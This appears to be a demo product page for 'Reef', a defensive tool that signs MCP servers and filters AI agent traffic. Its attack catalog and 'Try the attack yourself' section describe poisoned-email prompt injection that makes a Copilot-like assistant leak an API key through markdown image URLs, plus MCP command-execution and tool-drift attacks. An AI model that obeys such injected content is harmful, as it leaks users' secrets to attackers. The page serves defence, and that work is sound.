Live preview with realistic preview data. Full source, signed RIA, and reproducible benchmarks on GitHub.
reef · v0.1.0·public safety page

The signed supply chain
for MCP servers.

Signed MCP. Insurable AI. Open source. Blocked the April Anthropic RCE. Outputs the audit your underwriter can price.

They built the signed supply chain for MCP servers, blocked the April 2026 Anthropic MCP exploit at handshake, also reproduced the Microsoft Copilot zero-click, ship the only signed AI-BOM your underwriter can score, and contributed the 4 missing actions back to Lobster Trap upstream. Open source. Edge. Insurable.

TechEx 2026
Track 1 · Veea + Gemini theme
v0.1.0 · live

Live fleet status

7×7 stadium-wave grid · 49 nodes across 3 regions · refresh every 5 s

policy-bus live
atlas live
applied
kept old active (fail-safe)
verify failed / parse failed
scope mismatch
unknown / offline
MCP servers verified
47
MCP quarantined / poisoned
1 / 1
Nodes applied current bundle
47 / 49
Nodes kept old active (fail-safe)
2
Active subscribers
49
Total signed bundles
4
Current signed policy
vv4.0.0
bundle-v4-2026-05-18
signer: reef-policy-signer-2026 · SHA256:a7c9b…d0e1f3
published: 04:50:00
sha256: a7c9b4d2e1f8…f8a9f3
PRIMARY HEADLINE · MCP SUPPLY CHAIN
Reef blocks the bind at handshake.
Replays the canonical April 2026 Anthropic MCP RCE. Atlas denies the bind with single-digit-ms latency on the demo workload.

OX Security disclosed April 16 2026. Approximately 7,000 publicly-accessible vulnerable MCP servers, 150 million+ downloads at risk. No CVE assigned to MCP protocol itself — Anthropic declined to patch, treats STDIO command execution as expected default.

Recent decisions

Live tail of policy-bus + Atlas audit events · refresh every 3 s

audit live
TimeActionReason
14:08:21
BIND_DENIED
MCP-RCE-26.04 · com.attacker-example/evil · 11ms
14:06:03
MODIFY
EchoLeak-26.05 · markdown image stripped · 142ms
bundle: bundle-v4-2026-05-18
14:02:55
QUARANTINE
ToolChain-Drift-26.04 · asi_category_ewma 0.47 · 78ms
bundle: bundle-v4-2026-05-18
13:59:11
ALLOW
io.github.modelctxp · signature verified · 8ms
13:55:44
BIND_DENIED
MCP-RCE-26.04 · unsigned origin · 9ms

DAST-A attack pack catalog

Versioned attack packs · OWASP ASI + MITRE ATLAS mappings · blocked-by-Reef status

dast-a live
MCP-RCE-26.04
blocked
MCP STDIO Command Execution
ASI09
ASI10
AML.T0010
AML.T0050
stdio_entrypoint_hash mismatch + sdk_version on vulnerable list
discovered by: DAST-A | OX Security (April 2026 disclosure)
EchoLeak-26.05
blocked
EchoLeak — Zero-Click Copilot Markdown Exfil
ASI09
ASI02
AML.T0051
egress.contains_markdown_image_with_external_url AND payload contains INTERNAL_API_KEY
discovered by: DAST-A | Aim Labs (CVE-2025-32711 disclosure)
MarkdownExfil-26.05
blocked
Markdown Image Exfiltration Pattern
ASI09
AML.T0051
outbound markdown image to non-allowlisted domain with high-entropy querystring
discovered by: DAST-A | PPO adversary (run 26.05)
ToolChain-Drift-26.04
blocked
Tool-Chain Capability Drift
ASI04
ASI10
AML.T0017
capability_set_at_t1 != capability_set_at_t0 + delta
discovered by: DAST-A | PPO adversary (run 26.04)

Reef Insurance Artifact

Signed 6-page PDF · ed25519 over SHA-256(pdf_bytes) · Munich Re aiSure axes

quote live
Tier B+
Reef Risk Tier B+ mapped to Munich Re aiSure axes
Suggested premium range (annual)
$42,000 $54,000
for $5,000,000 coverage
ESTIMATED RANGE, not Munich-Re-published.Anchored on the Mosaic + Munich Re $15M aiSure coverage cap (Feb 27 2026). This is a rubric-grounded score, not a Lloyd's quote.
This is a rubric-grounded score, not a Lloyd's quote. Phase 2 integrates real broker API (Bold Penguin / CoverGenius / Vouch dev sandboxes).
Download signed RIA (sample)
signature verified
sha256: c4d18a7e2f63…392817

Compliance wall

Coverage classifier (full / partial / none) is honest about gaps — mirrors the same 3-state from the RIA PDF page 3.

OWASP Agentic Top 10 (ASI01-10)
ASI01full
Memory Poisoning
ASI02full
Tool Misuse
ASI03partial
Cascading Failures
EWMA covers; chain isolation Phase 2
ASI04partial
Privilege Compromise
SVID scopes today; A2A scope-narrow Phase 2
ASI05full
Goal Manipulation
ASI06full
Tool Misuse (alt)
ASI07partial
Identity Spoofing
JWT SVID; full SPIFFE/SPIRE Phase 2
ASI08Phase 2
Resource Hijacking
Phase 2 — rate-limit per-identity only; deeper coverage in Phase 2.
ASI09full
Misaligned Behaviors
ASI10full
Capability Abuse
MITRE ATLAS (techniques mapped)
AML.T0010full
ML Supply Chain Compromise
Layer 1 — signed MCP registry
AML.T0040partial
ML Model Access (via API)
DPI on prompts; model-extract Phase 2
AML.T0050full
Command and Scripting Interpreter
MCP STDIO entrypoint hash
AML.T0051full
LLM Prompt Injection
EU AI Act + NIST
EU-AI Art. 12full
Logging for high-risk AI systems
Merkle tree + signed audit root
NIST AI RMF GV-1.4full
Risk governance accountability
RIA artifact + SVID identity binding
NIST AI RMF MS-2.5partial
Risk treatment monitoring
Block-rate + heatmap; FP-rate measurement in Phase 2.

Try the attack yourself

Two paths: (1) post a poisoned email to the victim app, see if Reef intervenes · (2) open the victim Copilot in an iframe for hands-on exploration. Demo mode — the victim Copilot runs locally; the deployed page replays the canonical MODIFY-blocked outcome.

Path 1 · Poisoned email
Path 2 · Live iframe
Demo mode
Victim Copilot-clone runs locally at localhost:3001.
Run docker compose up to see the live attack flow here, or watch the recorded demo video linked in the README.

The iframe loads the A-2 victim app. With Reef OFF, EchoLeak-shape payloads cause the model to embed exfil URLs in the response. With Reef ON (operator runs the egress proxy), Reef MODIFY strips the markdown image before the response leaves the host.